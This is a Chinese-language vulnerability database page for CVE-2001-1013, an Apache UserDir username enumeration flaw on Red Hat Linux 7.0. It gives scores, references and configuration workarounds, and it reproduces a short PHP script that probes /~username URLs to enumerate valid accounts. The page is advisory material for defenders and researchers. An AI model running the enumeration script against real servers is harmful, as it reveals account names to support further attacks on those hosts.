CVE-2001-1013
CVSS5.0
发布时间 :2001-09-12 00:00:00
修订时间 :2008-09-05 16:25:28
NMCOES    

[原文]Apache on Red Hat Linux with with the UserDir directive enabled generates different error codes when a username exists and there is no public_html directory and when the username does not exist, which could allow remote attackers to determine valid usernames on the server.


[CNNVD]Red Hat Linux Apache 远程列举用户名漏洞(CNNVD-200109-044)

        随同Red Hat Linux 7.0一起发布的Apache存在一个配置错误,导致远程攻击者可能列举该主机上存在的用户。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1013
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-1013
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200109-044
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/3335
(VENDOR_ADVISORY)  BID  3335
http://xforce.iss.net/static/7129.php
(VENDOR_ADVISORY)  XF  linux-apache-username-exists(7129)
http://www.securityfocus.com/archive/1/213667
(VENDOR_ADVISORY)  BUGTRAQ  20010912 Is there user Anna at your host ?
http://archives.neohapsis.com/archives/vuln-dev/2000-q3/0094.html
(VENDOR_ADVISORY)  VULN-DEV  20000707 Re: your mail
http://archives.neohapsis.com/archives/vuln-dev/2000-q3/0087.html
(UNKNOWN)  VULN-DEV  20000707 Re: apache and 404/404 status codes
http://archives.neohapsis.com/archives/vuln-dev/2000-q3/0083.html
(VENDOR_ADVISORY)  VULN-DEV  20000707 (no subject)

- 漏洞信息

Red Hat Linux Apache 远程列举用户名漏洞
中危 配置错误
2001-09-12 00:00:00 2012-11-28 00:00:00
远程  
        随同Red Hat Linux 7.0一起发布的Apache存在一个配置错误,导致远程攻击者可能列举该主机上存在的用户。

- 公告与补丁

        我们建议你安装补丁程序之前,采用如下临时解决方法:
        
        
        
        1.关闭缺省打开的"UserDir"选项
        
        % echo 'UserDir Disabled' >> /var/www/conf/httpd.conf
        
        
        
        2.替换路径名URL
        
        % echo 'ErrorDocument 404
        http://localhost/sample.html' >>
        
        /var/www/conf/httpd.conf
        
        % echo 'ErrorDocument 403
        http://localhost/sample.html' >>
        
        /var/www/conf/httpd.conf
        
        % sudo apachectl restart
        
        
        
        厂商补丁:
        
        
        
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商
        
        的主页以获取最新版本:
        
        
        http://www.redhat.com

        
        
        

- 漏洞信息 (21112)

Red Hat Linux 7.0 Apache Remote Username Enumeration Vulnerability (EDBID:21112)
linux remote
2001-09-12 Verified
0 Gabriel A Maggiotti
N/A [点击下载]
source: http://www.securityfocus.com/bid/3335/info

Versions of Apache webserver shipping with Red Hat Linux 7.0 (and possibly other Apache distributions) install with a default misconfiguration which could allow remote users to determine whether a give username exists on the vulnerable system.

http://www.example.com/~<username>

When a remote user makes a request for a possible user's default home page, the server returns one of three responses:

In a case where <username> is a valid user account, and has been configured with a homepage, the server responds with the user's homepage.

When <username> exists on the system, but has not been assigned a homepage document, the server returns the message "You don't have permission to access /~username on this server."

However, if the tested username does not exist as an account on the system, the Apache server's response includes the message "The requested URL /~username was not found on this server."

Because the server responds differently in the latter two cases, a remote user can test and enumerate possible usernames. Properly exploited, this information could be used in further attacks on the vulnerable hos

#!/usr/local/bin/php -q
<?
/*
default misconfiguration which could allow remote users
to determine whether a give username exists on the vulnerable system.

        By Gabriel A Maggiotti
 */


        if( $argc!=4)
        {
        echo "usagge: $argv[0] <host> <userlist> <delay>\n";
        return 1;
        }


$host=$argv[1];
$userlist=$argv[2];


$fd = fopen ($userlist, "r");
while (!feof ($fd)) {
        $user = fgets($fd, 4096);
                         
        $fp = fsockopen ($host, 80 , &$errno, &$errstr, 30);
        fputs ($fp, "GET /~$user HTTP/1.0\r\n\r\n");
        while (!feof ($fp)) {
                $sniff=fgets($fp,1024);
                if(strpos($sniff,"permission")!="") {
                        echo "$user exists!!!\n";
                        break;
                }
        }
        fclose ($fp);
        sleep(3);
}

fclose ($fd);

?>
		

- 漏洞信息

637
Apache HTTP Server UserDir Directive Username Enumeration
Remote / Network Access Information Disclosure
Loss of Confidentiality
Exploit Public

- 漏洞描述

Apache web servers contain a flaw that may lead to an unauthorized information disclosure. The issue is triggered when the UserDir module is enabled and a remote attacker requests access to a user's home directory. By monitoring the web server response, an attacker is able to enumerate valid user names, resulting in a loss of confidentiality.

- 时间线

2000-07-07 Unknow
2000-07-07 Unknow

- 解决方案

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround(s): Workaround 1: Disable the default-enabled UserDir directive in httpd.conf: UserDir Disabled Workaround 2: Set generic error pages for 403/404 messages in httpd.conf.

- 相关参考

- 漏洞作者

- 漏洞信息

Red Hat Linux Apache Remote Username Enumeration Vulnerability
Configuration Error 3335
Yes No
2001-09-12 12:00:00 2009-07-11 07:56:00
Reported to bugtraq by Alexander A. Kelner <akson@tts.debryansk.ru> on September 12, 2001.

- 受影响的程序版本

RedHat Linux 7.0

- 漏洞讨论

Versions of Apache webserver shipping with Red Hat Linux 7.0 (and possibly other Apache distributions) install with a default misconfiguration which could allow remote users to determine whether a give username exists on the vulnerable system.

http://www.example.com/~&lt;username&gt;

When a remote user makes a request for a possible user's default home page, the server returns one of three responses:

In a case where &lt;username&gt; is a valid user account, and has been configured with a homepage, the server responds with the user's homepage.

When &lt;username&gt; exists on the system, but has not been assigned a homepage document, the server returns the message "You don't have permission to access /~username on this server."

However, if the tested username does not exist as an account on the system, the Apache server's response includes the message "The requested URL /~username was not found on this server."

Because the server responds differently in the latter two cases, a remote user can test and enumerate possible usernames. Properly exploited, this information could be used in further attacks on the vulnerable hos

- 漏洞利用

apachex.php courtesy Gabriel A Maggiotti &lt;gmaggiot@ciudad.com.ar&gt;. A new exploit program has been made available by m00 Security.

- 解决方案

Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站